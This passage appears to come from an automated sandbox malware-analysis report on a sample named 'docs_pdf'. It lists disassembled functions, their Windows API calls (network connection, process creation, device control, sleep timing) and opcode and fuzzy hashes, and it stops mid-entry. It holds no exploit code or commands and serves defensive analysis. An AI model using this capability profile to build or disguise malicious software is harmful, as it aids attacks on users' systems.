                                                            • Instruction Fuzzy Hash: 9121AC71E01208EFCB00CFA4C984BEEB7B9EF40344F044069E458A7250DB31AE46CB60
                                                            Function 00110BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __setmode.LIBCMT ref: 00110BF2
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0
                                                            • _fprintf.LIBCMT ref: 00110C29
                                                            • OutputDebugStringW.KERNEL32(?), ref: 00146331
                                                              • Part of subcall function 00114CDA: _flsall.LIBCMT ref: 00114CF3
                                                            • __setmode.LIBCMT ref: 00110C5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: bebf9dcbe4681a54ce5c7458569a394dd81f538081b8af53b7940e85645f4ee1
                                                            • Instruction ID: 5903df4c3d1c2dc6c08cc713f471f7b716a75c9e5ec65b7a8dd014784815dcc0
                                                            • Opcode Fuzzy Hash: bebf9dcbe4681a54ce5c7458569a394dd81f538081b8af53b7940e85645f4ee1
                                                            • Instruction Fuzzy Hash: 791124329082087BCB0DB7B4AC42AFE7B689F59720F14017AF208971D2DF615DC69BD5
                                                            Function 00161A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00161A97
                                                              • Part of subcall function 00161B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00161B40
                                                              • Part of subcall function 00161B21: InternetCloseHandle.WININET(00000000), ref: 00161BDD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 2a74df0b9a6c90505e20661e4afc57634cd9f79b634f38ab1caae61560f293cc
                                                            • Instruction ID: 05161f6effe1e1e4af39de93f4ddcc0014a798bb7c0660e39b9b706eb0da46be
                                                            • Opcode Fuzzy Hash: 2a74df0b9a6c90505e20661e4afc57634cd9f79b634f38ab1caae61560f293cc
                                                            • Instruction Fuzzy Hash: FF21CF35200A01BFDB159FA08C01FBBB7B9FF54702F18401AFA0696650EB319861DBA0
                                                            Function 0014E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0014F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0014E1C4,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?), ref: 0014F5BC
                                                              • Part of subcall function 0014F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0014F5E2
                                                              • Part of subcall function 0014F5AD: lstrcmpiW.KERNEL32(00000000,?,0014E1C4,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?), ref: 0014F613
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0014EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0014E1DD
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0014E203
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0014EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0014E237
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: fa973128a7ed3f53c7c4968e9f8111af56817b9540f78347292a75f52311a51e
                                                            • Instruction ID: 1a78b59e2bd2569edd359f8c68d50e33de81c00743668e708d2496a1883e086e
                                                            • Opcode Fuzzy Hash: fa973128a7ed3f53c7c4968e9f8111af56817b9540f78347292a75f52311a51e
                                                            • Instruction Fuzzy Hash: 24118E3A200345EFCB25AF74D845D7A77B8FF89350B40403AF806CB260EBB19891D7A0
                                                            Function 00125332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00125351
                                                              • Part of subcall function 0011594C: __FF_MSGBANNER.LIBCMT ref: 00115963
                                                              • Part of subcall function 0011594C: __NMSG_WRITE.LIBCMT ref: 0011596A
                                                              • Part of subcall function 0011594C: RtlAllocateHeap.NTDLL(00E80000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 834f7fc60389ed194f0543757be7a68728076fd79b4a8f3759569fb828d06c08
                                                            • Instruction ID: e224135e5820c34999795d4088bc88b902f9b8d62501ace8ac2107f5c83b5f30
                                                            • Opcode Fuzzy Hash: 834f7fc60389ed194f0543757be7a68728076fd79b4a8f3759569fb828d06c08
                                                            • Instruction Fuzzy Hash: DB112732904B35AFCF286F70BC856AE3796BF243A4F209439F9049A191DF7089D18390
                                                            Function 000F4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 000F4560
                                                              • Part of subcall function 000F410D: _memset.LIBCMT ref: 000F418D
                                                              • Part of subcall function 000F410D: _wcscpy.LIBCMT ref: 000F41E1
                                                              • Part of subcall function 000F410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F41F1
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 000F45B5
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000F45C4
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0012D6CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: c97644f9bcedd6897be5915d74e588d37118d09269d099299fc62f51bbbda8f0
                                                            • Instruction ID: 8a20ef6665df828a5679aa3cec75e55812b1091788903adc9cff41f39e16b5c1
                                                            • Opcode Fuzzy Hash: c97644f9bcedd6897be5915d74e588d37118d09269d099299fc62f51bbbda8f0
                                                            • Instruction Fuzzy Hash: 5F210770908798AFEB329B24E845BF7BBEC9F11304F00009DE79E56282C7741AC49B51
                                                            Function 001540B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001540D1
                                                            • _memset.LIBCMT ref: 001540F2
                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00154144
                                                            • CloseHandle.KERNEL32(00000000), ref: 0015414D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                            • String ID:
                                                            • API String ID: 1157408455-0
                                                            • Opcode ID: 5a450c752bc4162e50a6dcad86c392e44d499d70e2c5a1ecd42a4db0159c7cee
                                                            • Instruction ID: 58ced24e8742c20e26775c21a25a5267e234d36115732361d822b2c03df7f341
                                                            • Opcode Fuzzy Hash: 5a450c752bc4162e50a6dcad86c392e44d499d70e2c5a1ecd42a4db0159c7cee
                                                            • Instruction Fuzzy Hash: 4911A775901228BAD7309BA5AC4DFEBBBBCEF44764F1041AAF918D7180D6744EC4CBA4
                                                            Function 0016667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00157B20,?,?,00000000), ref: 000F5B8C
                                                              • Part of subcall function 000F5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00157B20,?,?,00000000,?,?), ref: 000F5BB0
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 001666AC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 001666B7
                                                            • _memmove.LIBCMT ref: 001666E4
                                                            • inet_ntoa.WSOCK32(?), ref: 001666EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: aa3b87df951d01e82fc2f19f8c2533114fd0ef8ed24e128e1bea2cb7513211a2
                                                            • Instruction ID: 782e5007a9762028d961e6cf2e62082850298cc10e9032e11625ce369ed76efc
                                                            • Opcode Fuzzy Hash: aa3b87df951d01e82fc2f19f8c2533114fd0ef8ed24e128e1bea2cb7513211a2
                                                            • Instruction Fuzzy Hash: 1611B235900508AFCB04FBA4DD96DFEB7B8AF18311B184029F606A7562DF30AE54DB62
                                                            Function 00149023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00149043
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00149055
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0014906B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00149086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: cdc198c36983dbca10f8945227224756ec9b0852920ceee6750169ea2f93393e
                                                            • Instruction ID: 5cb89fb6fb146c448f67ce843ffa5278586adbe45485a9560efdfe512888bbdd
                                                            • Opcode Fuzzy Hash: cdc198c36983dbca10f8945227224756ec9b0852920ceee6750169ea2f93393e
                                                            • Instruction Fuzzy Hash: CE114C79940218FFDB10DFA5C884E9EBB78FB48710F204095F904B7260D7716E50DB90
                                                            Function 000F1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 000F12D8
                                                            • GetClientRect.USER32(?,?), ref: 0012B84B
                                                            • GetCursorPos.USER32(?), ref: 0012B855
                                                            • ScreenToClient.USER32(?,?), ref: 0012B860
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 0a50fa0abd7c347490d68c93e5c0c2bf4357778e1022f28916c078fe2035ee24
                                                            • Instruction ID: 570337ac78aadc242ccbae5e5bbcdca8a3baf9de2fba9ed3f4d206fe86b1ad36
                                                            • Opcode Fuzzy Hash: 0a50fa0abd7c347490d68c93e5c0c2bf4357778e1022f28916c078fe2035ee24
                                                            • Instruction Fuzzy Hash: 9C113A3590001DEFCB50EFA4D8859FE77B8FB05310F000455FA05E7951C731BAA2ABA5
                                                            Function 00151652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 0015166F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 00151694
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 0015169E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,001501FD,?,00151250,?,00008000), ref: 001516D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: c47c7ac0fb77bddaa4d8959ae5026845bac852755eb690b7e7ff488b0b985a26
                                                            • Instruction ID: eaefd30249ca9c52753f56989231f93d81748008b5a86241545e9f5319b3468d
                                                            • Opcode Fuzzy Hash: c47c7ac0fb77bddaa4d8959ae5026845bac852755eb690b7e7ff488b0b985a26
                                                            • Instruction Fuzzy Hash: 30112531C00518E7CB059FA5D848BEEBB78BB09712F854059E954AA240CBB055A48BA6
                                                            Function 00127207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 854567406a0f4dc4f097a32defb4f9e41ca3461b160cdc2a500827c238f1593e
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: 29018C320481AAFBCF165F84EC028EE3F22BF29354B098615FA1858071C337C9B1AB81
                                                            Function 0017B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0017B59E
                                                            • ScreenToClient.USER32(?,?), ref: 0017B5B6
                                                            • ScreenToClient.USER32(?,?), ref: 0017B5DA
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0017B5F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: b89b70ca66f0250034af0ac3c3358d0e7011c8e2643fbd397e900224ba72913f
                                                            • Instruction ID: 64664c7ee4a772188ba779af98c41dbcef8a517cacf372c2236977fcb92f8bf9
                                                            • Opcode Fuzzy Hash: b89b70ca66f0250034af0ac3c3358d0e7011c8e2643fbd397e900224ba72913f
                                                            • Instruction Fuzzy Hash: BE1146B5D04209EFDB41DF99C884AEEFBB5FB08310F108166E914E3620D735AA958F50
                                                            Function 0017B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0017B8FE
                                                            • _memset.LIBCMT ref: 0017B90D
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001B7F20,001B7F64), ref: 0017B93C
                                                            • CloseHandle.KERNEL32 ref: 0017B94E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: 4553e65b745eee4d83a8492afd2fae4eff6a306d20bc37d6f3844271eace4003
                                                            • Instruction ID: 9a9174f81d6584a34d70a86a3c8053788967a9eef5568da06d81093a8034f30b
                                                            • Opcode Fuzzy Hash: 4553e65b745eee4d83a8492afd2fae4eff6a306d20bc37d6f3844271eace4003
                                                            • Instruction Fuzzy Hash: B3F05EB25443007BE2106B71AC05FBB3AACEB48354F004038FB1CE65D2D7718980C7AC
                                                            Function 00156E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00156E88
                                                              • Part of subcall function 0015794E: _memset.LIBCMT ref: 00157983
                                                            • _memmove.LIBCMT ref: 00156EAB
                                                            • _memset.LIBCMT ref: 00156EB8
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00156EC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 261ae3a2aab00124dd531ae72d1a5d237892165e50138383f88d81c0f393c649
                                                            • Instruction ID: f70d04f97b322e5e002ce9bb62b431bd3d0e25264f23cc5ef149f67f40ef4fa6
                                                            • Opcode Fuzzy Hash: 261ae3a2aab00124dd531ae72d1a5d237892165e50138383f88d81c0f393c649
                                                            • Instruction Fuzzy Hash: D1F0543A104200BBCF016F55DC85E8ABB2AEF59321B048065FE085E21BC731E991CBB4
                                                            Function 0017C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F135C
                                                              • Part of subcall function 000F12F3: BeginPath.GDI32(?), ref: 000F1373
                                                              • Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F139C
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0017C030
                                                            • LineTo.GDI32(00000000,?,?), ref: 0017C03D
                                                            • EndPath.GDI32(00000000), ref: 0017C04D
                                                            • StrokePath.GDI32(00000000), ref: 0017C05B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: 8bae369296804efe4d88ea9248582fe06374b5272cbc5fab703319b61d8182f5
                                                            • Instruction ID: 24c31aa85d029a79d37f816c064749af88999ba210e283738b952022f8bc2a9c
